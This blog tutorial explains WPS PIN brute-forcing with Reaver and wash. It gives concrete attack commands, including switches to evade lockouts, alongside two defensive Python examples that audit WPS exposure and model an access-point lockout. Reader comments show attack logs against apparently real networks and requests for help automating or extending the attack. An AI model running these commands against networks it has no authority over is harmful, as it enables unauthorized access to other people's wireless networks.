WPS Cracking with Reaver

We’ve previously covered how ineffectual WEP encryption is for securing a wireless network, showing that the Pwn Plug R3 can easily break into a WEP network in less than one minute. But considering how old WEP is, that shouldn’t really come as much of a surprise. Most networks will now be running the much more robust WiFi Protected Access (WPA), with WEP running mainly on the older systems that haven’t been updated or maintained.

But while it’s not as trivial as breaking into a WEP network, WPA is not completely infallible. Here we will take a look at one of the methods used to crack into a WPA network, and some of the pitfalls you may encounter.

 

WPS Pin Attack

An often overlooked feature on many WiFi routers and access points is WiFi Protected Setup (WPS). This convenience feature lets a user configure a client device against a wireless network by pressing a button on both the access point and the client device at the same time (the client-side “button” is often implemented in software). The devices trade information, and then set up a secure WPA link.

On the surface, this is a very clever feature. It allows less savvy users to establish a secure connection between their devices quickly and easily, and as it requires physical access to the hardware, it would seem relatively secure.

But a tool called Reaver has been designed to brute-force the WPS PIN exchange remotely, even if the physical button on the access point has never been pressed.

While some newer devices are building in protection against this specific attack, the Reaver WPS exploit remains useful on many networks in the field.

Note: To be clear, WPS is the vulnerable system in this case, not WPA. If a network has WPS disabled (which they should, given the existence of tools such as this), it will be immune to the following attack.

 

Finding a Network

If you’ve read the previous tutorial on cracking into a WEP network, you’ll recognize the command used to put the hardware into monitor mode:

airmon-ng start wlan0

From here you could use airodump-ng to look for networks, but Reaver includes its own tool for finding vulnerable WPS implementations, which is much more straightforward. To start it, run the following command:

wash -i mon0

The output will look something like this:

[Image: wash output listing the networks found, with their WPS Locked state]

This shows two networks which are, at least in theory, vulnerable to the WPS brute force attack Reaver uses. Note the “WPS Locked” column; this is far from a definitive indicator, but in general, you’ll find that APs which are listed as unlocked are much more likely to be susceptible to brute forcing. You can still attempt to launch an attack against a network which is WPS locked, but the chances of success aren’t very good.
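The same scan is just as useful from the other side of the fence: run wash against your own airspace and every row it prints is an access point that still has WPS enabled. The following is an added example, not code from the original article or from the Reaver/wash project, that parses wash-style output into an inventory and groups it into a remediation list. The column layout (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID) is an assumption about wash’s table format, and the scan text embedded in the script is constructed: every BSSID and ESSID in it is made up.

```python
"""Inventory of WPS-enabled access points from wash-style scan output.

Added example; not code from the original article or from the Reaver/wash
project. The column layout is an assumption about wash's table format, and the
sample scan is constructed (all BSSIDs and ESSIDs are made up).
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One wash result row. ESSIDs may contain spaces, so the ESSID is captured last.
WASH_ROW = re.compile(
    r"^\s*(?P<bssid>[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})"
    r"\s+(?P<channel>\d+)"
    r"\s+(?P<rssi>-?\d+)"
    r"\s+(?P<version>\S+)"
    r"\s+(?P<locked>Yes|No)"
    r"\s+(?P<essid>.*?)\s*$"
)


@dataclass
class WpsAccessPoint:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    locked: bool
    essid: str


# Constructed sample scan in the assumed wash layout; addresses and names are made up.
SAMPLE_WASH_OUTPUT = """\
BSSID                  Channel       RSSI       WPS Version       WPS Locked         ESSID
---------------------------------------------------------------------------------------------
00:11:22:33:44:55       6            -55        1.0               No                 guest wifi
66:77:88:99:AA:BB      11            -71        1.0               Yes                office-ap
CC:DD:EE:FF:00:11       1            -63        2.0               No                 lab-router
this line is not a result row and must be skipped
"""


def parse_wash_output(text: str) -> list[WpsAccessPoint]:
    """Turn wash's table into objects, ignoring banner, header and separator lines."""
    aps = []
    for line in text.splitlines():
        m = WASH_ROW.match(line)
        if not m:
            continue
        aps.append(WpsAccessPoint(
            bssid=m["bssid"].upper(),
            channel=int(m["channel"]),
            rssi=int(m["rssi"]),
            wps_version=m["version"],
            locked=(m["locked"] == "Yes"),
            essid=m["essid"],
        ))
    return aps


def audit_wps(aps: list[WpsAccessPoint]) -> dict[str, list[str]]:
    """Group BSSIDs by WPS state, strongest signal first.

    Every AP wash lists has WPS enabled. "unlocked" is the state a PIN brute
    force targets, so those come first, but the fix for both groups is the
    same: disable WPS on the access point.
    """
    findings: dict[str, list[str]] = {"unlocked": [], "locked": []}
    for ap in sorted(aps, key=lambda a: a.rssi, reverse=True):
        findings["locked" if ap.locked else "unlocked"].append(ap.bssid)
    return findings


def format_report(aps: list[WpsAccessPoint]) -> str:
    """Human-readable remediation list built from audit_wps()."""
    findings = audit_wps(aps)
    lines = [f"{len(aps)} WPS-enabled AP(s) seen"]
    lines.append(f"  disable WPS now (unlocked):     {', '.join(findings['unlocked']) or '-'}")
    lines.append(f"  disable WPS (currently locked): {', '.join(findings['locked']) or '-'}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(parse_wash_output(SAMPLE_WASH_OUTPUT)))
```

Feed it real wash output with `python3 wps_inventory.py < scan.txt` after swapping the sample for `sys.stdin.read()`; if your wash build prints extra columns, adjust `WASH_ROW` rather than the rest of the script.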

 

Launching Reaver

Once you’ve found a network you wish to run the attack against, operating Reaver is very straightforward. The basic command needs only the local interface, channel, and target BSSID to be specified. The command to launch Reaver against the “linksys” network above would look like this:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv

The only part of the above command that might not be immediately obvious is “-vv”; this enables verbose output, which greatly helps when trying to gauge how well Reaver is (or is not) progressing.

Once you’ve started Reaver, you’ll start seeing output like this:

[Image: Reaver verbose output showing PINs being tried]

This output shows that WPS PINs are successfully being tried against the target (here we see 12345670 and 00005678 being tested), and that Reaver is operating normally.

 

Advanced Options

Ideally, the basic command works and the attack progresses as expected. But in reality, different manufacturers have been trying to implement protections against Reaver-style attacks, and additional options may be required to get the attack moving.

As an example, the following command adds a few optional switches that can help to get Reaver working on more picky devices:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15

The core command hasn’t changed; the additional switches only change how Reaver behaves:

  -L        Ignore locked WPS state.
  -N        Don’t send NACK packets when errors are detected.
  -d 15     Delay 15 seconds between PIN attempts.
  -T .5     Set the timeout period to half a second.
  -r 3:15   After 3 attempts, sleep for 15 seconds.

This is by no means an exhaustive list of Reaver options, but it gives an idea on what kind of things you might want to try.
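The “WPS Locked” state that wash reports, and that -L tells Reaver to ignore, is the manufacturer-side protection these switches are working around: the access point counts failed PIN registrations and refuses further WPS attempts for a while. To make that behaviour concrete from the defender’s side, here is an added example (not code from the original article, from Reaver, or from any AP firmware) that models such a lockout over a constructed AP log. The log line format, the threshold (3 failed registrations from one peer within 60 seconds), the lock duration (300 seconds), the second-based timestamps and every MAC address are assumptions chosen for illustration; the lock is modelled as AP-wide, which is how the WPS Locked state presents in a scan.

```python
"""Model of an AP-side WPS lockout, the protection wash reports as "WPS Locked".

Added example: not code from the original article, from Reaver, or from any AP
firmware. The log format, the threshold (3 failures within 60 s), the lock
duration (300 s), the timestamps (seconds) and the MAC addresses are all
assumptions chosen for illustration.
"""
from __future__ import annotations

import re
from collections import defaultdict, deque

# Assumed AP log format: "<seconds> WPS: peer <mac> registration ok|failed"
AP_LOG_LINE = re.compile(
    r"^(?P<ts>\d+) WPS: peer (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"registration (?P<result>ok|failed)$"
)


class WpsLockoutMonitor:
    """Count failed WPS registrations per peer and lock WPS AP-wide when one
    peer exceeds the threshold inside the window. A wrong PIN guess ends in a
    NACK after M4, so each failed registration corresponds to one wrong PIN."""

    def __init__(self, max_failures: int = 3, window: int = 60, lock_seconds: int = 300):
        self.max_failures = max_failures
        self.window = window
        self.lock_seconds = lock_seconds
        self._failures: dict[str, deque[int]] = defaultdict(deque)
        self.locked_until: int | None = None   # AP-wide, like the real WPS Locked state
        self.alerts: list[str] = []

    def handle(self, ts: int, mac: str, failed: bool) -> str:
        """Process one registration attempt; return 'locked', 'failed' or 'ok'."""
        if self.locked_until is not None:
            if ts < self.locked_until:
                return "locked"            # AP refuses all WPS registration while locked
            self.locked_until = None       # lock has expired
        if not failed:
            self._failures.pop(mac, None)  # a success resets that peer's counter
            return "ok"
        recent = self._failures[mac]
        recent.append(ts)
        while recent and ts - recent[0] > self.window:
            recent.popleft()               # drop failures that fell out of the window
        if len(recent) >= self.max_failures:
            self.locked_until = ts + self.lock_seconds
            self.alerts.append(
                f"t={ts}: {len(recent)} failed WPS PIN attempts from {mac} "
                f"within {self.window}s; WPS locked until t={self.locked_until}"
            )
            recent.clear()
        return "failed"


def replay(lines, monitor: WpsLockoutMonitor | None = None):
    """Feed log lines through the monitor; return (monitor, per-line outcomes)."""
    monitor = monitor or WpsLockoutMonitor()
    outcomes = []
    for line in lines:
        m = AP_LOG_LINE.match(line)
        if not m:
            continue                       # skip lines that are not WPS registration events
        outcomes.append(monitor.handle(int(m["ts"]), m["mac"], m["result"] == "failed"))
    return monitor, outcomes


# Constructed log: peer ...aa is guessing PINs, peer ...bb is a legitimate enrollee.
SAMPLE_AP_LOG = [
    "100 WPS: peer 02:00:00:00:00:aa registration failed",
    "105 WPS: peer 02:00:00:00:00:aa registration failed",
    "110 WPS: peer 02:00:00:00:00:bb registration ok",
    "112 WPS: peer 02:00:00:00:00:aa registration failed",  # third failure: lock engages
    "118 WPS: peer 02:00:00:00:00:aa registration failed",  # refused while locked
    "130 WPS: peer 02:00:00:00:00:bb registration ok",      # lock is AP-wide, so refused too
    "500 WPS: peer 02:00:00:00:00:aa registration failed",  # lock expired at t=412
]

if __name__ == "__main__":
    mon, outcomes = replay(SAMPLE_AP_LOG)
    for line, outcome in zip(SAMPLE_AP_LOG, outcomes):
        print(f"{outcome:6}  {line}")
    print("\n".join(mon.alerts))
```

Two things the replay makes visible: a legitimate enrollee is locked out along with the guesser once the AP-wide lock engages, which is why the lock is a blunt instrument, and the alert line is the event a wireless IDS should forward, since a lock firing at all means someone was submitting PINs.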

 

Attack Duration

Even under ideal conditions, Reaver can take a very long time to complete its run. There is an element of chance involved: the brute forcing could theoretically discover the PIN very quickly, but in general it is going to take many hours to even make a dent in the possible pool of PINs.

Luckily, Reaver keeps a progress log file automatically, so you can stop the attack at any time and resume whenever it’s convenient. Spending a few hours a day running Reaver against the same network should uncover its PIN, and through that the WPA passphrase… eventually.


25 replies
    • 1withyou2 says:

      It means you are no longer associated with the AP.
      I fix mine by running airodump-ng mon0 for about 10 seconds, and then I re-run reaver.

      Reply
  1. 1withyou2
    1withyou2 says:

    Is there a way to have reaver re-associate with the AP?
    Mine gets stuck at trying pin 18295672,
    then I quit reaver with CTRL + C
    and run airodump-ng mon0,
    then re-run my reaver code and it starts working until the same thing happens, which means I can’t leave it running overnight.

    Any ideas?
    By the way, this is my code: reaver -i mon0 -b C0:C1:C0:C0:40:2F -S -N -a -c 1 -vv -r 17:30
    It works for about 15 minutes until I get
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 19525679
    [!] WARNING: Failed to associate with C0:C1:C0:C0:40:2F (ESSID: BeeNet)
    [!] WARNING: Failed to associate with C0:C1:C0:C0:40:2F (ESSID: BeeNet)
    ^C
    [+] Session saved.

    Then I have to run airodump-ng mon0
    and then my code for it to start working.
    How can I automate this process?

    Reply
  2. john
    john says:

    When I tried to crack a network with reaver it went good… I got a speed of 3 seconds/pin… but after some time its WPS got locked; initially it was not locked… then I tried reaver on another network and after some time of successful bruteforcing it also went to lock… What should I do to unlock it? I fear if I try it on other networks they may get locked forever… waiting for expert advice… my gmail is johnkhalifa1889@gmaul.com

    Reply
  3. Nope
    Nope says:

    > When i typed “wash -i mon0″,it showed:Failed to open mon0for capturing

    Try `sudo wash -i mon0` to make it work. 😉

    Reply
  4. salvatore
    salvatore says:

    Switching mon0 to channel 6
    [+] Waiting for beacon from B8:A3:86:E9:D6:7B
    [+] Associated with B8:A3:86:E9:D6:7B (ESSID: MAX02)
    [+] Trying pin ******
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 9c:1a:20:8c:91:e2:b1:4a:bb:dd:3d:d0:db:c5:62:01
    [P] PKE: a5:1b:fe:4d:7f:b6:ab:71:37:66:8e:81:68:6d:a1:67:6d:2e:4f:07:8b:e6:87:66:40:fd:88:75:79:06:d3:b3:fc:a5:0a:92:03:16:0f:cf:dd:fa:98:3e:46:5a:78:07:15:ef:53:d1:f8:36:d0:2c:37:92:4a:50:68:2c:55:23:c5:ca:05:01:87:38:5f:db:1f:c4:54:5c:5b:c2:58:d9:3a:e3:92:b4:4d:47:b5:4b:a9:66:db:6d:9d:8d:f0:7c:6b:73:65:00:ca:b1:20:60:81:46:d4:f2:ab:59:d9:d3:df:18:54:85:fa:d9:62:33:cc:77:4a:ad:eb:29:f3:bd:23:85:64:d5:3f:93:6a:ab:da:ba:ce:58:12:83:97:7d:70:07:a3:c4:40:44:be:23:5d:38:a1:82:55:d3:cf:31:8c:29:4b:dd:cb:e7:c8:cf:62:1b:4e:63:e5:f9:2d:d1:7f:0c:3c:b2:4b:ec:6a:17:8e:6e:96:38:02:b4:2f:fd
    [P] WPS Manufacturer: Ayecom
    [P] WPS Model Number: DSL2740
    [+] Received M1 message
    [P] AuthKey: 0b:c4:98:45:a2:4d:43:5a:aa:2d:bd:f9:25:84:6f:0a:86:70:aa:97:c5:d0:2e:15:c4:50:88:1c:71:df:9d:98
    [+] Sending M2 message
    [P] E-Hash1: e8:37:20:b7:74:0a:f4:8a:15:f7:26:98:69:6e:d5:5d:cd:9e:c6:50:a4:aa:2f:bf:2f:32:e6:aa:f0:51:9d:a1
    [P] E-Hash2: 11:9e:b6:bc:85:7b:54:fc:97:51:40:bb:ca:bf:ea:bd:d5:0b:b6:9a:f8:4e:c9:05:12:03:8a:bb:8d:7f:57:51
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin *******
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 55:1d:25:ad:f3:ff:0c:ec:5a:7f:4c:89:31:1e:69:0b
    [P] PKE: 80:e1:0e:63:30:6b:a9:35:cf:ff:dd:e9:35:ca:ce:51:7e:fc:cb:07:b0:9a:7c:a5:2e:08:32:fd:45:01:3a:95:ec:b9:ea:ab:47:3e:a8:07:04:41:01:7e:91:85:98:a7:6f:7c:e7:37:8f:d6:46:c4:a4:34:50:5a:65:ec:d0:ba:ec:e9:68:84:51:ba:1a:8c:28:f8:e2:0c:0f:1e:e6:34:7a:3c:89:22:1a:31:20:fa:cd:2b:21:11:07:b2:7d:07:72:fe:69:07:6f:50:17:09:04:f6:be:5b:20:07:e2:78:50:66:f8:a5:9f:9d:9b:67:3c:6d:ba:61:06:28:7f:7b:b5:3e:3a:ba:90:34:5a:ba:3d:b7:4c:ce:5b:07:ba:94:35:e0:c6:59:c8:c5:6d:ce:a3:f0:59:2a:18:78:38:cf:2e:48:66:50:03:01:83:36:cf:eb:40:e5:9b:4e:19:5b:19:7e:9b:45:ae:bc:37:44:0f:73:75:21:d4:3c:0c:9d
    [P] WPS Manufacturer: Ayecom
    [P] WPS Model Number: ********
    [+] Received M1 message
    [P] AuthKey: f8:1f:49:9d:30:0a:71:aa:4a:50:2c:64:d8:ff:ea:dc:91:3e:4d:61:55:53:9f:5a:1e:df:21:9a:b9:2d:5d:d0
    [+] Sending M2 message
    [P] E-Hash1: 59:e9:b4:ca:6b:ce:cd:85:16:1f:a6:bb:b8:1d:37:fc:d6:b1:21:ca:54:5b:1f:41:ee:2b:71:7b:fc:2f:56:5a
    [P] E-Hash2: 8c:56:ee:22:95:27:09:96:8d:fa:ca:81:ba:f4:14:e0:c1:5f:41:78:a7:b3:e2:6e:f1:3c:1c:9b:bc:a9:50:ac
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 11 seconds
    [+] WPS PIN: ‘********’
    [+] WPA PSK: ‘****************************************************************************************************
    [+] AP SSID: ‘Network-b8a386e9d67b’
    [+] Nothing done, nothing to save.

    ESSID and AP SSID are different, why??

    Reply
  5. Cyber wolf mad
    Cyber wolf mad says:

    I wanted to know… I know the WPS pin, so how can I use it to crack directly instead of waiting for reaver to crack lon again for hours???

    Reply
  6. Nirvana1327
    Nirvana1327 says:

    Reaver is dead. All new routers stop Reaver in its tracks. Yes, there are some legacy old crappy routers out there still vulnerable to the WPS attack, but they are becoming less and less common with time. Consider that the Reaver code hasn’t been updated in 3 years now. You’ll have to rely on more serious methods to break WPA encryption, which aren’t as cookie-cutter newbie friendly as Reaver was. Reaver was great for its time, but alas, all good things come to an end.

    Reply
  7. Pumpkin_Master
    Pumpkin_Master says:

    So can anyone explain why it tries the same pin over and over? I left it running all day and all night and it just keeps trying the same combination of numbers (12345670).

    Reply
  8. kron77
    kron77 says:

    What the fuck is “wps transaction failed x02”?

    Does this mean the entire attack is useless?

    I’ma let it run for 5 hours to see what’s up.

    Looking forward to a good answer, thanks m.

    Reply
  9. Haroon
    Haroon says:

    I’m using reaver on Android (Samsung Galaxy S2). I just want to know, is it normal for my attack to take over a week? I started an attack and it’s been going continuously for a couple of days now, and I’ve been keeping track of when it says 39.87% completed, and I think it will take just over a week (approx). Is this normal? And why does it take so long, because on websites they say max 10 hrs? Plz email reply to haroon815@hotmail.co.uk, ty. I’m just curious, it’s working fine, just curious on why it takes so long for me compared to what the Internet says.

    Reply
  10. Wps
    Wps says:

    I made a video specifically for wps routers that get locked by reaver /bully. Search YouTube for how to hack wps locked routers using vmr mdk. Please like it, share it, and subscribe to my channel!

    Reply
